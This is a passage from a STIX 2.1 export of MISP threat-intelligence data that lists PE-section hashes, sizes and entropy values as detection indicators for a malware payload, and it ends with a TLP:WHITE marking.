"uuid": "7533d176-2922-49e4-91b5-50db38c441f8"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b",
"category": "Payload delivery",
"to_ids": true,
"uuid": "959e75c1-5c91-4246-9ef3-f79bad253842"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY",
"category": "Payload delivery",
"to_ids": true,
"uuid": "bb826f80-d656-4650-ad25-5871e58a5699"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:43:24.000Z",
"modified": "2020-08-02T18:43:24.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rsrc",
"category": "Other",
"uuid": "992e2373-7cf4-4f4a-98a1-2fae9ceeb893"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "1c84aa0f-d3cb-4f9d-bd33-a530c005aa02"
},
{
"type": "float",
"object_relation": "entropy",
"value": "3.3542400671361",
"category": "Other",
"uuid": "51647ac3-e887-4fef-b56e-dc9a3cafd699"
},
{
"type": "md5",
"object_relation": "md5",
"value": "fcd1605d1d9f49547d0d1a001563946a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "8a766358-7028-4969-8feb-c5542a366574"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "ac720c8a08e4fb15215b7d2f5181f301a4bdb075",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6ee6d0a6-f0dd-430c-98b8-6b6b8c369f52"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e2f9f32d-4c2c-43c4-bac7-c428469b6743"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a9a39f3a-fbc1-436f-8c00-e46953d761d2"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND",
"category": "Payload delivery",
"to_ids": true,
"uuid": "1de2af3c-0377-4636-914c-2b99e6e53694"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:44:24.000Z",
"modified": "2020-08-02T18:44:24.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rsrc",
"category": "Other",
"uuid": "aea237dc-3990-42c9-a520-c16735707264"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "f9e63bb3-b550-44da-bb6e-c5273377f0a5"
},
{
"type": "float",
"object_relation": "entropy",
"value": "3.3542400671361",
"category": "Other",
"uuid": "43db1d82-3c06-4b43-be0d-ebd732243699"
},
{
"type": "md5",
"object_relation": "md5",
"value": "fcd1605d1d9f49547d0d1a001563946a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "52d1185b-7538-4358-bf79-3a8df1aece8c"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "ac720c8a08e4fb15215b7d2f5181f301a4bdb075",
"category": "Payload delivery",
"to_ids": true,
"uuid": "8aa6dd94-f17b-43f8-8cb0-2194177bcd83"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919",
"category": "Payload delivery",
"to_ids": true,
"uuid": "c3dc63c7-0999-4fa9-b354-9714660470f5"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257",
"category": "Payload delivery",
"to_ids": true,
"uuid": "4b1faca7-16d1-4fb2-a34a-c2ce3323da95"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND",
"category": "Payload delivery",
"to_ids": true,
"uuid": "75cfed24-ec5f-4065-8335-37cb548fb06a"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:45:01.000Z",
"modified": "2020-08-02T18:45:01.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".reloc",
"category": "Other",
"uuid": "06dea17e-b60d-4211-8f31-8f036cfba40b"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "0de40bf8-81df-4961-86c9-4e16ff2e15e2"
},
{
"type": "float",
"object_relation": "entropy",
"value": "5.9461169615076",
"category": "Other",
"uuid": "a3ca1adf-67fa-42a8-96c1-f3cfc983eb3c"
},
{
"type": "md5",
"object_relation": "md5",
"value": "2e582f4b09f310087abc12cfbf505d06",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6b061b3f-634c-4229-a9d8-cc8979311f1e"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "1d6c92f1a273c02c810e23d72d1458a6fd46fec1",
"category": "Payload delivery",
"to_ids": true,
"uuid": "c36c52f0-0ec1-4749-a2e1-9f2fe1fbac00"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "1018c326-f42a-4ada-bee0-6753036899c8"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5307695d-e49d-42bc-98d1-3c309fb668ce"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l",
"category": "Payload delivery",
"to_ids": true,
"uuid": "1c9fff4a-4705-4728-b3f1-25cbb0a08bf6"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--072b4d8e-b602-458e-9a96-71242a752828",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:45:51.000Z",
"modified": "2020-08-02T18:45:51.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".reloc",
"category": "Other",
"uuid": "f3a2141e-1665-4f09-8239-0f5f1136a6ee"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "db905034-d0c9-473e-8e90-748edeaec6e8"
},
{
"type": "float",
"object_relation": "entropy",
"value": "5.9461169615076",
"category": "Other",
"uuid": "5d4c0ee8-ddef-4bb7-8828-8e0cc15edea8"
},
{
"type": "md5",
"object_relation": "md5",
"value": "2e582f4b09f310087abc12cfbf505d06",
"category": "Payload delivery",
"to_ids": true,
"uuid": "81abf6c2-3ef7-44dd-897c-e71f1f7ee662"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "1d6c92f1a273c02c810e23d72d1458a6fd46fec1",
"category": "Payload delivery",
"to_ids": true,
"uuid": "ae0607e4-2deb-4276-ab36-ee504bdf95af"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "621cedb3-22b0-49d3-b41d-8aed1cf563c2"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107",
"category": "Payload delivery",
"to_ids": true,
"uuid": "39882cc0-0ea1-44ec-8532-90ab9ca93fc6"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l",
"category": "Payload delivery",
"to_ids": true,
"uuid": "d92abd90-8a08-44e9-b5f5-3ce18363dacc"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}